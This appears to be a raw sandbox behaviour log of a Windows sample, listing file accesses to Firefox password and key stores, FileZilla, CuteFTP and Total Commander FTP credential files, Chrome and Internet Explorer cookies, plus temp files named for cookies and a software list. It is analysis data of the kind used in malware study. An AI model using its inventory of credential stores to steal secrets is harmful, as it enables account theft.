Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Windows\wcx_ftp.ini	desired_access = FILE_READ_ATTRIBUTES	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\VirtualStore\Windows\wcx_ftp.ini	desired_access = FILE_READ_ATTRIBUTES	1	Fn
Create	C:\Users\aETAdzjz\wcx_ftp.ini	desired_access = FILE_READ_ATTRIBUTES	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\GHISLER\wcx_ftp.ini	desired_access = FILE_READ_ATTRIBUTES	1	Fn
Create	C:\ProgramData\GHISLER\wcx_ftp.ini	desired_access = FILE_READ_ATTRIBUTES	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\GHISLER\wcx_ftp.ini	desired_access = FILE_READ_ATTRIBUTES	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\FileZilla\sitemanager.xml	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\FileZilla\recentservers.xml	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\FileZilla\filezilla.xml	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\ProgramData\FileZilla\sitemanager.xml	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\ProgramData\FileZilla\recentservers.xml	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\ProgramData\FileZilla\filezilla.xml	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Local\FileZilla\sitemanager.xml	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Local\FileZilla\recentservers.xml	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Local\FileZilla\filezilla.xml	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\CuteFTP\sm.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\ProgramData\CuteFTP\sm.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Local\CuteFTP\sm.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Program Files (x86)\CuteFTP\sm.dat	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\aetadzjz@g.live[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\aetadzjz@google[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\aetadzjz@live[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@ad.360yield[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@ad13.adfarm1.adition[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@addthis[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adfarm1.adition[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adformdsp[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adform[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adnxs[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adscale[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adserving.ancoraplatform[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adsrvr[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adtech[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@advertising[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@angsrvr[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@api.bing[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@at.atwola[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@bidswitch[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@bing[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@bluekai[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@bs.serving-sys[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@bs.serving-sys[3].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@c.bing[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@c.msn[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@c1.microsoft[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@casalemedia[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@connextra[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@crwdcntrl[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@demdex[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@doubleclick[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@dpm.demdex[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@exelator[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@eyeota[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@google[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@ibeu2.mookie1[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@ih.adscale[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@linkedin[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@m.exactag[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@mathtag[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@microsoft[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@msn[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@openx[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@pixel.rubiconproject[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@pubmatic[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@rubiconproject[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@scorecardresearch[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@semasio[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@server.adformdsp[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@serving-sys[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@serving.experianmarketingservices[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@smartadserver[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@tapad[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@track.adform[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@turn[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@w55c[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@www.bing[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@www.linkedin[1].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@www.msn[2].txt	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Cookies	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\cooB07B.tmp	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\cooB07B.tmp	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08D.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08E.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08F.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\cabB090.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\cabB091.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\cabB092.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\cabB0A3.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\flaB08C.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\cabB0A4.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\cabB0A5.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\cabB0A6.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\flaB08C.tmp	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	2	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\sofB0D5.tmp	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\sofB0D5.tmp	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create Temp File	C:\Users\aETAdzjz\AppData\Local\Temp\cooB07B.tmp	path = C:\Users\aETAdzjz\AppData\Local\Temp\, prefix = cookies	1	Fn
Create Temp File	C:\Users\aETAdzjz\AppData\Local\Temp\flaB08C.tmp	path = C:\Users\aETAdzjz\AppData\Local\Temp\, prefix = flash	1	Fn
Create Temp File	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08D.tmp	path = C:\Users\aETAdzjz\AppData\Local\Temp\, prefix = cab	1	Fn
Create Temp File	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08E.tmp	path = C:\Users\aETAdzjz\AppData\Local\Temp\, prefix = cab	1	Fn
Create Temp File	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08F.tmp	path = C:\Users\aETAdzjz\AppData\Local\Temp\, prefix = cab	1	Fn
Create Temp File	C:\Users\aETAdzjz\AppData\Local\Temp\cabB090.tmp	path = C:\Users\aETAdzjz\AppData\Local\Temp\, prefix = cab	1	Fn
Create Temp File	C:\Users\aETAdzjz\AppData\Local\Temp\cabB091.tmp	path = C:\Users\aETAdzjz\AppData\Local\Temp\, prefix = cab	1	Fn
Create Temp File	C:\Users\aETAdzjz\AppData\Local\Temp\cabB092.tmp	path = C:\Users\aETAdzjz\AppData\Local\Temp\, prefix = cab	1	Fn
Create Temp File	C:\Users\aETAdzjz\AppData\Local\Temp\cabB0A3.tmp	path = C:\Users\aETAdzjz\AppData\Local\Temp\, prefix = cab	1	Fn
Create Temp File	C:\Users\aETAdzjz\AppData\Local\Temp\cabB0A4.tmp	path = C:\Users\aETAdzjz\AppData\Local\Temp\, prefix = cab	1	Fn
Create Temp File	C:\Users\aETAdzjz\AppData\Local\Temp\cabB0A5.tmp	path = C:\Users\aETAdzjz\AppData\Local\Temp\, prefix = cab	1	Fn
Create Temp File	C:\Users\aETAdzjz\AppData\Local\Temp\cabB0A6.tmp	path = C:\Users\aETAdzjz\AppData\Local\Temp\, prefix = cab	1	Fn
Create Temp File	C:\Users\aETAdzjz\AppData\Local\Temp\sofB0D5.tmp	path = C:\Users\aETAdzjz\AppData\Local\Temp\, prefix = softlist	1	Fn
Create Pipe	\device\namedpipe\d3b6c4de8cf79a854b549ee232f08c89	open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, max_instances = 255	1	Fn
Add Search Path	C:\Program Files (x86)\Mozilla Firefox	-	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	type = size, size_out = 171	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	type = size, size_out = 196608	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp	type = size, size_out = 171	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\	type = file_attributes	4	Fn
Get Info	C:\Program Files (x86)\Mozilla Firefox	type = file_attributes	4	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	type = size	1	Fn
